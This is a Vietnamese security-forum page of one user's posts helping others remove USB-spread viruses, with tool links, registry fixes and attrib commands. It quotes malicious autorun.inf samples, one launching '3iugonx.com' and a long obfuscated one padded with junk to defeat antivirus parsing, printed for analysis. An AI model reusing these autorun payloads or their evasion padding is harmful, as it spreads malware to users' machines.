English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Messages posted by: kamikazeq  XML
Profile for kamikazeq Messages posted by kamikazeq [ number of posts not being displayed on this page: 4 ]
 
Góp ý và Hỏi đáp thắc mắc chung  Empty  Go to message
smilie, thì mình nói chung cho mọi người muốn làm cho nó bự ra bình thường ấy mà smilie.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
http://www.box.net/shared/sb9cbhy65r

Tool giúp mấy bác nào khoái diệt tay sẽ nhanh chóng phát hiện ra máy nhiễm lây file, để còn mau mau mà chọn hướng giải quyết khác, chứ không phải ngồi đó lọ mọ End Process này nọ (trong đó có mình nữa).









Thảo luận mạng và thiết bị mạng  Empty  Go to message
Có cái TrafficShaperXp, cài trên từng máy để hạn chế từng máy, cũng dễ dùng.

Nhưng mình chỉ biết thiết lập cho trường hợp có 2 máy.
Ví dụ thằng kia down nhiều và mình muốn chia đôi, mình qua máy nó, cài soft này vào, hạn chế lại còn 256 . Bên máy mình cũng cần thiết lập 256 để tránh làm phiền nó.

Với trường hợp có 3 máy:
_ Hoặc là bạn thiết lập hạn chế 2 thằng kia mỗi thằng 128 (vậy thì có thể yếu và hao phí 128 nếu như trong 2 máy đó chỉ có 1 máy đang xài mạng, vì chỉ xài đc 128, còn 128 của thằng kia thì để ko smilie )

_ Hoặc thiết lập cho 2 máy kia tự chia sẻ cho nhau cái 256 đó. Thiết lập sao ở soft này để được thế thì mình không rõ. Có bác nào chỉ mình luôn không smilie.
Góp ý và Hỏi đáp thắc mắc chung  Empty  Go to message
Với thẻ quote, bạn có tăng size nó lên nó cũng "dị thường" à.

Bạn giảm 1 mức size của nó thôi (tức là -1) thì nó sẽ bằng size với mấy chữ kia.

PS: sao lại có chuyện ngược ngạo vậy kà !??
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Thường thì nếu virus còn sống, bạn mở ẩn thì nó tắt lại ngay lập tức.
Đàng này phải Re máy lại mới bị nữa. Cũng lạ.

1) Bạn chạy http://www.box.net/shared/zm98y3dr0f sau đó RE máy rồi coi có bị nữa ko.

2) Bạn vào trả lời những câu hỏi mình đã post trong topic này và gửi 3 log của Hijackthis lên đây :
/hvaonline/posts/list/28315.html
Thảo luận hệ điều hành Windows  Empty  Go to message
Có thể khóa đó đang bị nó set permission.

Bạn tạo lại với tên "everyone" và thiết lập quyền là "Được tạo nhưng không được xóa" để hạn chế phần nào việc nó xóa. Và khi đó bạn cứ Import hoặc tạo key bình thường.
Thảo luận hệ điều hành Windows  Empty  Go to message
Đầu tiên bạn vào kiểm tra 2 khóa đó, nếu nó chưa có thì đúng là sẽ không vào được SafeMod. Lúc này bạn hãy thêm vào như hướng dẫn trên.

Chỉnh xong 2 khóa đó, bạn đợi vài giây, xong rồi nhấn F5 và xét 2 trường hợp sau:
_ Nếu 2 khóa đó bị mất, tức là vẫn còn có Malware đang liên tục xóa 2 khóa đó, phải tìm cách khử nó trước.
_ Nếu 2 khóa đó vẫn còn, bạn tiến hành Restart lại máy và vào SafeMode xem sao.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Dựa vào nguyên lý tạo các dll theo 1 kiểu giống nhau của họ Kavo, nay có tool nhỏ này giúp phát hiện cho nhanh (chỉ phát hiện thôi nhé, diệt thì tính sau :"> )

http://www.box.net/shared/xonvvj4edl






Thảo luận hệ điều hành Windows  Empty  Go to message
Theo mình thì cài cái gì tùy bạn thôi. Yêu thằng nào thì xài hết mình với nó smilie.
Mình kêu bạn cài BKAV chỉ là vì nếu đúng bệnh thì nó dọn dẹp nhanh nhẹn.

Bạn cần tìm hiểu thêm rõ về cách truy cập các ổ đĩa, và hơn hết là thiết lập Disable hết chức năng autorun của máy tính đi. Link đây /hvaonline/posts/list/26123.html
Thảo luận hệ điều hành Windows  Empty  Go to message
Tức là sau khi cài hoặc Ghost lại Win, vào được Win rồi thì khoan mở các ổ D E F vì có thể các ổ ấy có chứa những kiểu lừa lọc của Virus khiến bạn có thể bị dính lại tức khắc.

Rồi làm tiếp mấy bước mình nói thôi.

Nhắc lại là làm chính xác nhé. Làm khác đi rồi báo lên là mình không biết đâu à smilie
Thảo luận hệ điều hành Windows  Empty  Go to message
Có lời giải rồi nè.
http://www.virusvn.com/forum/showthread.php?t=1059
Thảo luận hệ điều hành Windows  Empty  Go to message
_ Cài lại win lần nữa.
_ Cấm truy cập vào các ổ khác (D E F ..)
_ Tải và chạy http://www.box.net/shared/zm98y3dr0f để nó khử autorun.inf trong máy bạn.
_ Tiến hành download BKAV trước, cài và chạy, quét các ổ khác (D E F ..)

Bạn làm 4 bước trên (thật bình tĩnh và chính xác nhé), có thông báo hoặc vấn đề gì thì lại gửi lên đây.
Thảo luận hệ điều hành Windows  Empty  Go to message
Nếu chỉ đơn giản là

Attrib -h C:\thumuc

thì không thành công vì thư mục ấy đang có cả thuộc tính System

Bởi thế phải thêm -s vào nữa thành

Attrib -s -h C:\thumuc
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
@pegasus66491990:
Ủa, không online cũng dính từ USB được vậy, con này lây USB mà.
Nói theo kiểu bạn thì dẹp luôn máy tính khỏi xài là khỏi dính.

@shadowdark:
FireWall nếu thiết lập "hỏi nhiều" và bạn phải tỉnh táo thì có thể chống nhiều phần.
Nhớ là nó chưa dính nhé. Còn nó dính rồi mới cài FireWall thì mình không biết đâu à.

Thảo luận hệ điều hành Windows  Empty  Go to message
Thử 2 cách sau

1) Gõ vào notepad nội dung bên dưới và save với tên abc.inf
Sau đó Right click file abc.inf, chọn Install.


[Version]
Signature="$Chicago$"
Provider=Symantec

[DefaultInstall]
AddReg=Them
DelReg=Xoa

[Them]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools,0x00010001,0
 


2) Gõ vào notepad nội dung bên dưới và save với tên xyz.bat
Rồi chạy file xyz.bat

REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /F 

Thảo luận hệ điều hành Windows  Empty  Go to message
Nội dung autorun ấy khi up lên hình như bị bỏ bớt.

Đây là file autorun.inf ấy để các bạn dễ theo dõi. http://www.mediafire.com/?omnbwmjuu33

-------------
Edited
Thử xóa hết nội dung rồi save nhưng vẫn còn dư lại 2 bytes này, không như file autorun bình thường (0 byte).



Thảo luận hệ điều hành Windows  Empty  Go to message
Mình muốn đọc file autorun.inf bằng lệnh

Code:
Open "C:\autorun.inf" For Input As #1
For i = 1 To 100
Line Input #1, s
msgbox s
Next i
Close #1


Đọc những file autorun.inf có nội dung đơn giản thì OK.

[COLOR="DeepSkyBlue"]
[AutoRun]
;a2kso9okAkjl83caSfH3
open=3iugonx.com
;lKaO2k2s7f2S99ko34Dqs1dSZ52
shell\open\Command=3iugonx.com
[/COLOR]
 



Nhưng đây, file autorun.inf này nó thiết kế để chống Antivirus, làm cho lệnh đọc bị lỗi theo.


; ½¼D‰fIJɲuÀŒ×ü™G¬¾ŠÌ·rkXïîOVüjŠfŸAL  




;fb 
; ÑÃoÈÞµÏKkA¢PaŸÃTªx¹uerËfJ•ojP½ãFf¹wu¨iÀgH…bêmKªZHyFL
 [   TdkjJufXACQXwTrqdYPpjbSC] 

;Kf’Z  
;  ǐöÃerªK¯D¥øoJUqHK­¦emTiv×N¹q÷CIogå×f¡cìD¾ÞcÍ 
  ajzLmMmVuIndpuy =lcH 
  QPDdnsHCDPoyNqFrWqCPwdLwE  =  EYhdLWGyLTaLO 
 
 KQKpTKLgSQvADhzMNrhSy  =   VZqYYrMDNyVUqfoNwyaUdSitL

; YBQ¯HSŸoÂbOÄžbèErwu£ïmœhHk¤âFyú€b™®ièdÛZorf´Nv•Æ
;XÂÚOq¥Ì÷ÁÌk‡ÒÖÃàMSv‚­qhÃHh
XQQT= KXpdSzJH  
; XVkPøEðAƒïoÙzúl¨GOÛ¥boeS 

;í¦Ÿ‚V†è§ivp›åòÉvüƒöÞÌ®¨zìdåE  
;  TNoAŸê›ÐquOëLGbÿEðvàÞ‚DYiÕXïäjBºVw¨j‰üRÝ



;  RŠÁÖH¬µCAqVrÍppÜ­†ËÑ´h³nƒfm¼gjAÇKkÂRT›´Wt”XËUBu
   FfWcviZFJ=kMHcLuKMpxbeHUvVLDm

;m¿¢DÌðØvîÏÊX˜ŠÜ•òHÏeÇwýŸœeVlÌDÖSVnnªiPgëpr¿uhªp¾U¢qo
; ÆfÇUág¤héaÚÐu¥QEP„ÚvA³“oï 
Oy= X
; bÊU¦æé£I±õ‡ÌlPTðp¸ïðšâŽñÕA†ÄÄxz



  
 
  
FibxDcy =  vXKaLimbaYwSjV

;   
;  ONVç×ëiWwnESWieà  
;ªª»áÐîV¦UwÀœúÚëQcpB–ìáEuæ 
;ƒdEMFMkHVdÝzE
hNkoIumHmuk  =   YeTJ  

;åaÛËtD—øÍehÄ

;  VaŠjÛmñKDrÖÈq¶s€€­ËÒzúyÒoF
;  O¦åxœlhsúBsRß²rFC±e‚™Z—ëåÔ°tŒ ƒ’coGaAÒønýêcú
  
; ÍÞQU˜Bq·o°–fYÓFvÒVauÊÌCSÈXHRMÛ×­Cƒ­B¨W÷jP 

  
 lErlVdHCsqyQpCGb= lADRVhXyrbrvwbR 
 
; NùØflÓãNBþ·Çf“Hž 




GDopXKSdiq = nbGmMXLwZsDW 

; 
;   


  V = b   
 
;  
; ßmÉq¤PepUPÓQtyD‰J˜m v€zè

;   Mk¥ËÅI€  
;ãBýJ—êDKù¯¢«iÂhYtjtm·OÄyä¸ébH½MErP¾DÏz·Ãµßpn

 
EbaZlTYcBbgsuNyHA= MUt  
 
; 

 

;LzÁBGoljB
;MRṙ÷OMpEM™Îx¡®‡yæTeßG 


   SwkgHtTA =  YhuluEEVXrwHxcIMCAemHn
;©Iiþ½PpkégY݈œ 

;—ÈÀPæBˆtMÑÆÊV
 



 ARI=UehzEyMvadlDxIRdDGRluR  
;ÕÈ“Ôu»Dç·yò°VW½ 
;áS½Ú×…ZBÖü
; Ábj˜˜ŠlI¹DÃbxKŒyP 

; 
 
;  ÙÐùSLCŸX 


[ MUGFeaRSXVUNZU]
;‚«mKÿ¥×ãLcK¡†³ÂªCAÞcYCãQíd•Ê»ÏDÕK
 
;  qëAweÜEd°çöïlWO¦Buqûo•QµL 

;   Y™sŸLóÆÁ¥ymLšu
; kLñEÝû¦GF¸©ÖiÚbD®ù

;NSnkITpíe 
HcI=  eZKabCjLwlSblRL

svCQKf  =TlyzJYZN

 HDmtLfc=  rTvWotHiTxVObR 



; Svæ×ÀdÈúÉn…ÆdìÈ®KÏáÞ©yqÊÃP•äbn¸s”k
;
 sSg  =B 
; njØ‘D¹ílXmAdZäçMMn—oˆio­¸A®u΁fö—oBSDq­S£ÔMÊ÷uE‰KqE¶äCZÛp½EYW®™üM


;yWëZ 
;  âéÙØðvƒÉÃpoÜÜXhI€b
;
;àéñ÷îPx´§ðe­UîÃN·mœöNcØ¢eIb±pØkt¾ 
 DkbRAsIkb =lKIhzuZmKMAbuzuMdWPWFx 

  JpGusPMHYfA =  JVcourlC

; Ái˜rliXoðIjµšA 


 
 

  YUTvcKNulgVNkTbcNhN=HzVpnAQK


;  lhAkKö
  
;qSV„E­AƛէPp¦èêxÚQ¯†sKqBÀÐÅÍgðÑFm


 uVP  =  Sge 

OpdzL=tAVAcKliVTTwTmznICEilcGAE  
;¿jSCIÝœJÁŠœ…llòpM¼vÝ…¹ÕFM½¥´IGq€­ñrƒÒFmUnŠHÄZs¿¾PWvUækIPIÚ¯kvÓ 
 
  gHJcrnbHrTtZLyPyKLmsrZZ= UEBGFMaiHpfDTMtUXZzjOcr 
 
; EDëNgUxXAID¬×Ý‹ø•Ÿvÿ¢ìku
 

; NrEœÊaäeRNcßwû«JÙQaiCA§nv  
 
; rHn—JlCX‹tpKϯK˜˜yeFM³T†¡™åBhï
 exqVMWbmM = KNtKqLIrGm
 


 


;   yìlqô°í…wö‰mmsY€€åzéWql™MKPqHhvjKDjGQýµtFgÐuÆy 


mjaTnOlHKTMXrcEPE=  pB 


 
;ÛúNMP§ioMÉ™Cp×½AW Ùuûõül‹Ì¹µñb 

  HKACUUYMdJEgNuTa=dDoAbKuxgHBrv

 funNYQJZbDUlxuivrKj  = hsxzuRvLSAtARdPCLTgslooQ

 
;î„Z¼Kîj¾Ý×tq¹qûðCÍózx€íS

 SbAkYmqj= NmMNjYyiM 
; 



; P‹wºhqÛtQørnùcÕUfŒYRÆàavvÅBQk²qÙkrßq·Kw¸afw

 
; 

 uqwQlFFFuoSlCWsOmjxzc  = kEryqRHuFFltvrpHImLn 



 aeBzPqtJ= Vm  
[ jyFPhb]
  

; tfP¿¾×FhoæVr¡SIh»æ
 

 
; dçfxÉ’£gðžTát‘KÖšedxE gåLQNQmNG¢  

JnAbQXPxdFGMQlA = hthUTgGdKclFvzZzTS 


;g™TY·ºOì


pwIoQiCkVDktrkgDApLXPy=QUNwLnjqXTJIVJpxHTSHaVCVi
; ɶk×q½ÁuYnfB
; YY¬t
;U»lm§ÙòÿQq­Áb¶eLtZœÝV¸SÂeíHkgHnýw«Þ€±aH zTùŸqØG× 
 GKTPFbubWDNaxEKIeMdThK  =ZCWMJh 



; bênqqبnMq洐ZEm¾  
;  épfþQXYqWÔp»ãA…ûb¬  


 tdqRWRUjTxrjk=  wHAOFvaJCLBKKHtf

; 

 
 
 HlzdxIQsfh= YtIFTCFqOBOFtCgAwPL
;« âi’ZªC¹šCW®ggSÜÞñPuXhJtFITH×NuPKMtñ³hÏKsÿvu³xG  
;  Dúò—WŠXNÑQ³®oÝÅt½Üi¸Sm



;  

; AãUȸ­w¥€dCTëu  

WOSAjJEKrDduvpCtjcszAwT   =JIXFIuBRhH 

;
; ¦Åno…²¨ŒpÙIPäòQîV×T˜æ‘q‹ùu‹WxúOæú¼RhZXÑíZb  

;¼mBg›I†WìXQ

; ÙÅóÃä

 iqSTxJiYHraLAWEdXMuJxQ  = pcF 

; 

; RæÚòPRøÈt‹rŠônd 
;  ¹tmgEqØKFS¼IÄE×b­·¾QxLãtßH¶°KT‹ÏVkj

;   


  oxMHaAWaaApvh  = OcBLpZz

[ZYGEbWkuyUXSCvhnvmMXn]
; …“C¨TgD³îg•ã½ïË—eˆÃMŸÆLAAlkKhQJÚ  
;  ÁlwyUiAvSälKMOxd¶p·F«ÁHoãXQH¸X’÷GC÷šnj  
 

;  



 FRwSL =CvhXem

 
 
oWoEHAXTROocK = ofufjoBmcHJV

;    


BDK =UfvBmImeNGYKZkGBaxxFgv  
;   
; G“rIMRÏ×UóÖY—b 

 BPRzHgwFttpyp = mZJ 
;

  

 to= OLxhQBnYWPbxzPCyGPp 
  MlqlNhptvZyACRFBmCh  =  JuyVVxLpFvWqrLX
  
; X®’åWIí«rœÔ‰Æ
 CVkihnxgjU  = aTCQdMPqiaALzwYWht  

;  Ý  
; J¥ýÈTÞeUSËVŽVdGÍòUÉs˜AA†˜HBß‹w¤vÝ¿ÙßZQÄwF¸©ud 

 
  iJYhDcuFiysmjuJDTIrH  = IrXXSEUIWaF 

; 
CZzGfhC=ssIwjW
;   





  
  mVSBafvZnkDFgoH =  JPpufaYKpAd 


; “£€Îs½UosÚÆCWH÷Ac뤯AFDL 

rYmTRHosrHViCjybAQU = hgrPDlouqVJpXOWtzxgTQFQXQ
; fpÕ“yäÛíhmY—U«n÷pMa©†RxrݶŸŠ‹Ìy¢ºq¼m¿
  
;fÁYlyxyIôqœˆRH¬³šjrp´ßDl€llWhbùRTy»îpp•ZiÂÑåCÓË
;  jVM¡Ôz“çâFuAºZt¹SfxƒVŽd¦wwÍX£MeºáKSPcÁBOL‹‘ 
 

;  áÄG‰æßGotEw¤obKÁÿÌqc©YhXMfó¡… 

  kRCV = sEfZFenvGQPXe 
; ý­¯Ì¼ebPÒûiJîkJåC£Bbëa 


;žoQh¼³¯
;€WÇñš’D†aλ¶c¦ ù½Áazò
 SH =   JrXonjtrCzaWPg
  


; 
;X¾r…hð”yÊÁGñRÎÔGà  
   
  [jQrGSCaUUaeq
;zEÈg¸TnegndXe“gm‘SkŸßOkk»ŒRhã



  


MKsAxIzkpt=  UTRRAXUCSEuYnpRjio 


 nZHOuBOPBuyWECREDg  = jRno
;  hR„Àu“TNüyK–ƒÑXDy 
;  QGJ¹UÃ…bCtJåðodFΦwL†EÀ



;ïÿ»H 

[cSEtyH]

; ¿¦n‡ýuufiY¼¶MþA´oýe‹RCÇmZl‘MxšmOWc°ŒOúFJ«NJZiBE§môNшKPyÁ 
;  NÊ£P”Ø

;NU”äOØ«ºH‘kPiùJ¢¼çGÚkAL›­NYXm²wßщ¸ýÔr«cŽ
 

; ¯fod °Ò•GSÅhU
 jediuuUmiPx= b


; 
; ÛuÉ•ôf´YgÐMþΓYøú 



;Yñ®ðþWuØDËöNm¦êìοkh“HçsÏPiÈüBNoqƒ²nRÑ´×

TTkq= xvxLnKEdHkRmUfCtBpFgHLLA 
 
   E= PFRll

;Æ
 bYFnHHeadl =  CW



 Bl=  tJUA  
;   öNI×€hbl¢KîBauTÉ®iiÛÃj›q£MF‹wS€ÝésŽUf¤¿Ï•ºƒPøK¢hu±Z²  
giUAZiUuwsYhjmxghZkbs=  KLFcW
; b’¤KrNk­AîHÏÙùñ·KSsUçÅC’¹qj±FÆW¥¹‹blÝ‹tÈžpÄAOnß 



;Zir†LdöŽpwÈw̱he¿w½t¨fk€KLpñ¥ûCK¬rpúv
 
;L¨¿¢ëpèô 
;UB‡dñºhrzuiäA˜‰®g‹³ 
 mfasfrEfKTYuFvw=Ou   



psXcEYuRFHvankJ=  XctkVaIJtmxnnRtRP 


  BxjihoDpXDqTIfRoBSxYhIfe =   AbGH 
;”¾qq“³qLvÀWÃFgSªqclgÕvcKPfºƒÞÎÆfv 

WfBrObd  = DSaKfmRuLmTdpzIZ

; äÅrÌqeÙS




NEKqotcAcONwqcZLmLqLtNT  =tZdERkvejhkQqCkLP


 y  = EHsEtTBYkhrinVJnSgY 


 
[PtXBtzzL]
 




 YRMj  = AXusAObTzlpZX   
;¨ÛDn ĨNcq¿rÏe  



;  ¼˜¦uÉ×x­æÕGMl—qRgYÿX½ºB
ZhEsiicjih   = hEGgYi 

;  £otbÖö«TNµÙ£kېOj

;  ÀVÍÑ଴fÁmGNj

 xijpqqeIMuFrDQUclewLi = U 
; çcQwfSè
;  
;   ÛæfVšfU›Vi›UOjœoLÞÝßMœ ¸½¼bñX”lNáGTítc
;ð¹jÁiL›P†¿³‰¯õoKZãIS¿koªþy 
;pKtþ¡ÇÏ”pÁíWpixWiügÿ 

  LEKlgyhn=EAgAEjD
;  é†rp²¿Nv£EFÔOeDŠG¾öµŠ¤ßtcK’ui–¯H×çö‡ýu׌KO¥Ð 

 
CbAFMNyMhVZDjlZDwCon= vccBHgnCLxguerApEe



 Ct=  uGg


;  
DlOdzlFFxKZf =luCLFCfNSOkASLCPcRnT  
 
vdDHjLqWsiuPFvNhFhj =vHDchEELsuHHa 
;  inbC‡tÖ€‘ñPÛYkôO 
 FsAqrrNXcTWBQcZijSQ =mEOthQuDpgNmsVXOHXcfSQqF

OVMgxFBOwk =bBTtmCOlBfIYRiIvCYqmUp

;  L’rGÄœçcƒ‚EáÑùjMçJOLhiT³




FAzKRqHGmwUTwzujxQHZlr = IweKhCCZOK
;”Fs·§mmA›OÇ×¼¨A²s    


  uurYaUpmBRzmXWBvCughwr= zjCUPRNHAXEzLZ

;–wBØr›HÀz
;   TPmG™AMÑµÖ 

; 
;  HÜi±­TÞA¡ dïÿ•Gt¾ÄäfzQçsÑŽ¿»³Eà¨plòWfSΨãÐpo
;³DˆÙmÿ·úFÄèPúÖxfªGþöj”PTH¢„qÉcyù”dŽ
 QuTXQSpmGug  =zxZTWlcVUWlLdMoSo



; jâPCL‘åñcmüWµëG 
; D–ôPb—LCê¦CòÝD«JRÞ姤SµÀŸp²‡Y¸


 
 
BRgpTFRz= FULEDxBBttXRRVpmJYNOVfgz

 m = ns
  WrJsfJcIn=epoNsKvl 
; õZMÏDmNnõkAhtßwÎfÇðOidàúsXÉoˆ¢ØVU³À 
FuLxRxUnRAQvUWJpznmlgb  = zhhoJdEFjxiozbVnWAedWLs 

 
[  Da 

 UsKdHRqJOuhKPGmwL   =qlffcwWyX 


VIExBTdtoWZWEevETzGAYgNC  =  RPSXLCcEidTVcTkAg  

   

;¿ÎkS¸LÄyLlo×WXTqop
; ObÍõð˜ÊXUbWÇðKÊOQw멘gk
 
;  itkÛ®rxÂh
 SRZVdPqODMKinHG=YyrFyxSWSnDwhSQkCILoVJcU 
 [   peUsJJQGIaLamcjsAIoAl] 
   
;uÇzt±wFpÈÜyM“d¸¿RLKLfý©«DçS¦üqˆëx‹ÏLÆ 
;ßï”Mb
;åíÁ¬’XCÝmI½à“²MÿIfTå«N„bæ 
;  Yrµjf²Æ¾wEº»NDޏˆÿ³íy¨þT¯µÖXmýúIb


wIEfr = JGMUsjwnDolulOT  

;   §ìl‡BÑ
; Íh¯p÷gJG˜žÜ¯¢âøyZk§raõï’SZPR 

;   rÎTчp§NretR


;
GPXxT = ZqRcURHrkBOrmstbvT  

; 
;¬PHW§¡CÒJö¥˜vV“²HcÎB÷E 



j   = tEJpPROuaQluPlKR

;  NÐÍhpeƒchyZBnþ”ŽRúL
  
VlPVJbbXSr=JMTYvPUoIfuSDyPpWIQMBR 
 

;¯UÃG­ƒÈo†©¢écP£¥þTAe¦jr ¦“ˆÔJd¼¦q
; ¤ŸUõÎýcFdFf¢´
;  ¯’l“QEd®mm‘•VãRtyÚgŒçzkMÄ™ilOè¾XÉŒsPMÃRLÙß 

; ´qxaÓ¿ÖZ²Bò  
  EqWibXTTvvwFMeU  =q 


  

 
[oTbDZRs]
;   
 cCHZubEW= pYQvICEsYstXZqHvSjI 
; 趶EgÜJgnGKS¸KE÷W–bJúzii¡vrø‚ióåuþÌEÆ­qCaUI¼ÛeÃåÙ  
  



NrgYdlIoloAdzsYUkKGAkzfb  = m

; 
; ŠGUX
; °éO²P

; 


 qZUVzSM  =OzJcQNbR


;   àùHY“åToS¤êÌÞÊýý»QJDN·wR™õjVXB£mz¾lq±Kñc®áw

HNypGwSHucDII=CMKpAXtIvzurWhGArknCdH  
; 
 kDgiaLJhIamP=DIVjmpnwWhTCm
IGLXCPhucJgGkLZgstvZigU =   qrYwGZkMjzgsEulYResH
; Hçeá¼’ƒøaiÕVBLEèuu™MrŽptdrÉþfuuN”s•IìàK 

;nplHŒRßZ‡UÝ„CoQŽ¢YbE£ÕBæÞBfeyªm



;  

 
  CpdUdUjKk = TzzTG



 

 


 BJIhbgznlogtjJrHiCpDNj=  OIxAyFXyudaAiNnvC  
 



; Ôà¤îx„àe™µySïBgÑcb¡NqÓÖIÄXa½x¤kgxNhÝYšKîlæÚS¬  
 [ KBWsclKjYpMcTj]  

;³U‹Óç—ÀWùEMÀrÚh¿o†Œæçe«Ot–¬…G 

;KÛÎêÆbE¿WRÈ—JéLmærAúLýj£ÿSaT¡FsÝ€yI’ùVôÙP×I


;   xR‡Yøµ
 jnFTmeJQeUgQkCHn=  UFReoSDMGFJqkQLJrVOWt
;
McdDAQWmjqRgIqSkt =  DiQYcEsYsSaTVbvxkSvhgKde

; ³KFöQKW•aMÝðMJZ±ºÄ¡SWjGzASmïW


   
 QwHHByFVoAapcOrO= jKvCsEWOxSIujkzqr

  
;  ¸XÇLOjÇèIXTdAeãÓmRÁbV³‹¨n„O§LZØ‹ZHÑ©


  


 [  tvqZMnsdqFXMllrehUnP]
; êX¸jvx—º€ÇE…ªmÿâlÉq
 



;  ADMZ¾ø•ùÝ㚈açñùE̾ÍÒǘfê
 
;   H¼B«OˆJŠI÷D‹dF‘MJRýXBÀ¢¾kîpÑMfø‹ì¯ª­àFÒAškLq
;  
CXlHxzNbYXdMudvlbtTQ =SHQwWgqrb 
 
; ycCžlœ÷ÂÕãUjC½•œj 

 
; MsX¯®gW­
;
;VªJ—Lyïx

 yXJQdZWCizvfCJuLYjdOfF =sJ


;


pQEpIevxxZqyRvNvKNXKaJJpC   =WJKDBCnZ

  

   

 mScurkMRcdsPNqEZtWwVPh =  nknJNYJutdEuRnFpcIFUh 
; 
;  
 
;  


;ÿBTŸp¡â¹•YvRx
  ECJb  =nHmyPbyf 
;g‘H±HÄÛYVHS¦puWìWݘYBâüojõ”†jŸH®¬ÿ­ZGC  

;  yªùè¨o½bWÖf‰Aq½KEdèeb”óON•»¼M 






 cmjwlzjstwmp  =faxROzNoCWEWW 

 


 

;  €úFgùÄwÛÜÜcbZ ±jmwKV”šy˜•Hû•úçæñýipòJ±Eþ„b¨
 UNLseA =  DixxeoB
 
; XmBRRvíúPC–èKöäT©žhYÁaëB  


BcOJH=ZyKeeWOAKzNncHXOYaOLdj 

;økkûývUERDÐGUwIfiFvŒëðttx‹hkVIsg‘k–NˆÌþ–QlL  


; P¬ÍxŒGpoH

  
hnVEiFlSKG =dExXFBhTZSmJ

; KjçDTí㦈fÙÈijcUøæhW 


 
zLCrboyrOtuwcDE =  humsXgUv

; ಈcüO

;  dZGv“ú˜ÈC¬H‡ºVXFÇRMG 

HHNtzoJuchWfx=  FnhOB

; îFMšNŒ  

;  så±ÞiŽW’ɦ¤ï¶¤HÌòxýfŽRQÙgf“OÀ³
;  ßcýlzEHNŽwG¦YOwÑ® 

;i¤XxÀëpŸBXŒ¹±NFž¾úwn’ekôþhqlb• 

;‹XBpüxñà‡RAXO¾Ça‹Tyþ‚¶eCsQ¸C€
  NbWKfeTadEmlUnOvKaBhenH= ArRni 
  hMFbsuVnxhdGMFCIuYwgiYXA  = IlTgAWfZlEjlBXd
; 
 XEunwxirMIFHfxJVWoofZtpd= ZnTVbbMBdG 
 
; 

 VmmpPOsTJNLZJoQPNj = CMWlR 
  pPMbVygVXSNeI=  EK

;  ƒnìD§´oZgOß·bómilVÙã–Z
;  OtuÅzܬ߲݃i‡

 RwkkivjTwNxbYI=FGMxAEjEo  
;  


 mHbo = AFOKCFGUAsIc  
;  EGôjùÕ –ÖIòeµWy°ÈE
;  c³®SMuÈ…¯ígínpRvvMrvßSRYReœa«DtYtudM 
; 

 



[ GEWzsouzk] 

LOWYynREZ =lvLf 


   [uVWZ]



; ÐodteU¶úcaêTˆs§º
;   
;  FîÿûlQI¦T t–çpðm

 
 yUedxzYUx =  TXcpq
; 








LtDjDZSfhavc =  nxDuswHGCjoS


 wFNT  = Bsqb  

  eHLcfnqxZfiHQ =  IZTwDZBLfUzE
;  û‹Ct½rjBiLaNVhðmÀe¢D’wkM    
 JtIXYz= itneEeNEEnxBV  

  cbvKmKJCRbdgnTubJlojnUDe =  EoMFNxHpVRxBLjcBPDx
; J»ÊÏ…Öñ„TzW‹èM¦Ú TTCæT²y”Yvaøhr…Ù‡m™UoõÃN‰WªGAr±
; XXwÍãcÚÜLÒ½hMv¢HlTM»iKPÆr¬–qNdý£Ùž 
 kZREvfU=WN 

;kÇK¡yvCf‚chö®ÌmbYaŽ´úTM±FQäý£d›üäÎ
;¾Gu‰rVWõÛŽIÀÒüi¥I†B£ZFçQ
;  jWQKTÏŠycµ˜„¦x¸DsèJ 
;  ʼnm¯±®ABv¦AQzšÖOG戁n
iYpvHZUKdxWi= bG
;s³iúÏüÞaïдÍÃEÏzWwðJ‘kŒGFbMÑXuüTJ‰ormc½FzEkDEªÜ‰àeI̐pDQªQÌ„f§Yþ

;  

; ísFGÚ·onmõ´NvM”dPˆµêæÀjsly†YDŒ¬U½SåÿÌElÍmnf±ÄØÞt  


;  ‰úÒDãkmfÔbÄiúORþ‹rÕw¹ÏöÅW½DT’Páh   
; 
HitFFzHDrpH =AmuiYSulJfQaEbuqtrBq
; UÏmPA¡TpDsuBTU½d‘êRacÂf·¹ñÒ€ç´çWGuë 
; ¤  
; wUvÏŒ¾ö

;ÃEsA†gfïºç³âƒwVtuÅYœbx£

  OcGGWGEkcnya = IdreWEYpbkzhc
;   
;  wÂHéqI–vTóEO¹ÐÍfeÊC¡ß„‡Eªhÿq¼õM


;     
;¿Â‡‚²u¿Ùóbu
XLs = mCyL 

fOoPBLwPyk = JLlQsoWAOVBzfSb
;l®ÇfÉ…R 
ENPkdWSBvrAsFPmQbfyMtlQ   = abzQWwrqWKJPUKrnzqecbOXs 
; wùŽÚ±kN­lYGÖÂ 



 
  wouRUdZNA =  TwUQnBzDFYU  
 
 
;Ècë“qjž«tüðgMrÔå»fQtcpåCi‚Í”ŠOuºtYw‡
;ˆ’Þ‡zà   
; Z£fNqe

; IŒµHßQ‰í

 WfQMII  =  PTYierktvtRubcTbZnL

;  
;


   
   ZNz =  AArKhcpM  



;  

;   
;   xD›uZá±MSãngªHoúèazNaTínYF


 WZDWhXWkwv= rVxI  
;vÿ©BD¹Ì³uW³¾ÿjÜEÙzZJP
 
  
  

;  ‘bÙz•“Ï—TCùLHŒá‰ènmyAr 
 hKNHYYnPersBZnsuDk = RmwZaOIrmEB  
;  ©YTPrñdV¡K…EUloqïCáhI—qp‹ÅœMôjl¦n”VhjzHúˆ
; uŠvPXü


;Êâi÷NLpƯhEmG÷õq  

  [ mts] 



;iTJ·ï¡H–UxåVBnLP»XKq‡bIºEÂäíx›E  

;  Jt“­DYg®T
yscgSAZQDRPnraBcAN = dyJQbuHpczHYLRSTME


;   
   OsfNwlVYVBlVZ =e 
; Í  

 

 ytZHaijDJp   =  grcwiwYdoMIdxf

; vPqTjukjxpWzÔA 
  

 

;  
 rR  =  TTfpEyxdAOEHmgqVIMhFPVRUP
  

;   Vðnvb„¯pprheëÐ
 O  = ZOZtcJJ 

 
